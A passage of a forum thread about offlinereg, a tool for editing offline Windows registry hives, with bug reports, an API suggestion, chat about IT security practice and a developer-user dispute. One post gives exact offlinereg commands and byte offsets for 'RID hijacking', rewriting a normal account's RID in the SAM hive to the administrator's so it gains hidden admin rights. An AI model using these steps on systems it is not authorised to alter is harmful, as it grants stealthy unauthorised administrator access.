Jump to content











Photo
- - - - -

offlinereg


  • Please log in to reply
295 replies to this topic

#276 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 17 March 2019 - 03:11 PM

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 


Edited by osfixer, 17 March 2019 - 03:21 PM.


#277 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 19 March 2019 - 03:19 PM

What you could do also is add support for adjusting permissions.. for keys, values. 

This could be done only through command line I think. 

 

Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?

If it doesn't you can add /inherit switch..

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 19 March 2019 - 03:25 PM.


#278 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 02:33 PM

Following a post here on how to blank an account's password using offlinereg, this time, lets see how to perform "RID hijacking".

The local admin account has a 01F4 rid.
What about "patching" another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy...

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.



#279 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14825 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 02:55 PM

This can work with the guest account as well.


Nice :)

And once again all it can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it



#280 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 03:04 PM

Nice :)

And once again all it can be used to preent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type the bios password but is perfectly valid in a home environement.

 

Disk encryption like bitlocker adresses a lot of these "local" attacks although I feel bitlocker could shortly be broken without even having to get the key from the TPM chip...



#281 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14825 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 03:12 PM

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type this password but is perfectly valid in a home environement.

 

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.



#282 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 03:21 PM

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environement and it is alreay a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first names, x letters for last name, etc ) thus witnessing regularly users who forget their username because it is so cryptic.

And then a 8+ password characters which has to include digits AND non alpha num chars with a policy preventing the use of  the last 16 passwords...

 

That only is enough to keep dozens ot IT ppl busy every day :)

I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.

 

Now, on a good side, in big corp environements, SSO/delegation makes is so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall thus : if the user credentials gets compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy - I really would not want to be a blue team sec guy :)



#283 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14825 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 03:33 PM

That only is enough to keep dozens ot IT ppl busy every day  :)

 

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

Usual activities of IT people I know:

1) Saying NO, it is NOT possible to whatever request

2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.

3) In all other cases do something (usually trivial) and make it seem like it is:

a. difficult

b. possibly very, very difficult

c. even better, very, very difficult AND tiring

 

:duff:

Wonko



#284 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 24 March 2019 - 03:45 PM

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

...

 

Sounds like you have had bad experiences with IT departments :)

 

Running an IT dpt, I have a difference experience.

A good dpt will be organised in different levels using ITIL processes and based on a service catalog with SLA's : 

-level 1 facing users with one task : solve the issue/address the request in less than 30 mns max with an objective of 60% of all tickets solved in L1

-level 2 specialised in different fields (networks, systems, etc) mainly focusing on more complex requests with an objective of 30% of all tickets solved in L2

-level 3 specialised in a field (network for example) AND a platform/solution (checkpoint/fortigate/etc) liaising with vendors/editors if it really needs

to

 

Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient maneeer.

 

Now I am more into IT Ops and I appreciate that adressing new needs, specially around Apps, is quite different and possibly deals more with project management.

 

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions :)

 

Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive  :lol:



#285 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14825 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 24 March 2019 - 04:04 PM

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions  :)

 

So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right ;).

 

Your particular IT department   :worship:  is then definitely the exception that confirms the rule. 

 

 

Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive   :lol:

Agreed :)

 

:duff:

Wonko



#286 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 06:11 PM

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg

[ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
main error:Access violation
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
"Machine"="" ; Network access: Remotely accessible registry paths (None).

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths]
"Machine"="" ; Network access: Remotely accessible registry paths and subpaths (None).

Edited by osfixer, 29 March 2019 - 06:21 PM.


#287 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 29 March 2019 - 06:54 PM

 

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

 

Good news for you is that you dont have to use it : life is good ! :)

It is not as if I had not warned you several times that i have put little efforts in the import command and thay you should prefer reg load/unload for this specific matter...



#288 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 06:55 PM

So you are intentionally not fixing bugs? That is really weird.



#289 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 29 March 2019 - 06:56 PM

So you are intentionally not fixing bugs? That is really weird.

 

Not exactly.

I am intentionally defining my priorities.

Nothing wierd there : I believe all human beings do so.



#290 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 06:58 PM

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..


Edited by osfixer, 29 March 2019 - 06:58 PM.


#291 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 29 March 2019 - 07:01 PM

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..

 

Lets stop the discussion there.

You dont like the tool? You know of other tools? All fine with me.

 

I am not asking for any credits but at the same time will not accept negative comments not will try to decrypt your under statements.

 

You have been gently warned.

Dont spoil my fun.



#292 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 29 March 2019 - 07:04 PM

Instead of saying thanks for discovering your bugs in your software, you are
now saying sorry can't do. Heh.



#293 darren rose

darren rose

    Frequent Member

  • Advanced user
  • 440 posts
  • Location:Norwich, Norfolk
  •  
    United Kingdom

Posted 30 March 2019 - 02:06 PM

@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude.  He creates tools for us to use for free out of kindness, he has a job to do like all of us, so can only devote limited time to these projects.  Why not just be grateful for what he does.  If it doesn't do what you want then use something else.  All of us here on this forum appreciates the work others do, and understand it is a hobby or side projects, we don't demand fixes and then get stroppy when we don't like answers. Perhaps take your attitude elsewhere

 

@erwan.l - I personally thank you for all you do, and use some of your tools such as this which work well for me, I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with



#294 misty

misty

    Gold Member

  • Developer
  • 1032 posts
  •  
    United Kingdom

Posted 25 April 2019 - 09:11 PM

@Erwan
Hello my friend. Due to another long absence on my part it has been some time with we crossed paths. It was with some sadness that I caught up with recent comments in this thread. You handle negative feedback and criticism with a maturity that does you credit.

Your continued efforts in developing and sharing your work are always appreciated by me, and no doubt many others. I hope you continue having fun here for years to come.

OfflineReg does many tasks very well, and as you have pointed out, there are alternatives out there for some functions.

I will try to catch up with the changes in your latest release - this is always an interesting process when your version numbers are taken into consideration :whistling:

Misty

#295 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2735 posts
  • Location:Nantes - France
  •  
    France

Posted 29 April 2019 - 05:56 PM

Hey Misty,

 

Long time no see :)

 

Thanks for your kind words !

No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) and as long I can remember I have encountered "challenging" behaviors...

Thus, I am still there and having fun and I am planning on making it another 25 years (at least !).

 

Think about it, Wonko has been there since dos 3.1 (if not VAX.VMS) and he is still this charming guy we know of  :cheers:

If he can do it, I can do it  :lol:

 

About versionning, well hopefully, Wonko miss that post and not comment on that one (...) but there is some hope : I am currently migrating as much code of possible to lazarus/freepascal and this new IDE gives me some more capabilities there.

In short, all binaries should see the build number increase auto, the software should also display the build number auto (getting it from the binary itself) - example here with vmount (lately migrated from delphi7 to FPC).

I will also stick to a version.txt containing some extra binary details.

And I may even go as far (as some other dev guys on this forum) as including the build number in the filename.

 

It could be a good idea to define our own standards here on this forum in a dedicated post.

 

There are some great experienced guys on this forum who could share their views there.

 

Regards,

Erwan



#296 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14825 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 29 April 2019 - 07:46 PM

No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) a

 

Yeah, definitely kids today ;):

https://tinyapps.org..._in_my_day.html

 

About versionning, well hopefully, Wonko miss that post  ...

 ... after 25 years are you still grasping at straws logical impossibilities? :w00t:

 

 

 

 and not comment on that one (...) but there is some hope 

 

By pure chance, Wonko happens to be in exceptionally good mood today thus your request is exceptionally granted [1].

 

 

 

:duff:

Wonko

 

 

 

[1]but this of course doesn't exclude the matter from future conversations on the public park bench ;)






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users